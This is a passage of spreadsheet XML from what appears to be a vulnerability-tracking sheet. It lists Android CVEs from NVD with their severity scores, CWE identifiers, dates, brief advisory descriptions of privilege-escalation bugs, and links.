      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S414"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T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28600</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S415"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T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28602</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S416"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T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28603</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S417"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T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28607</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S418"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T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28611</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S419"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T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28612</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S420"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T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28614</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28616</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28620</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28624</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S424"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T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28631</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S425"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T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28634</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S426"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T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28636</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S427"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T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28639</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S428"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T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28642</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S429"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T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28644</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S430"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T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28650</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S431"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T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28653</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
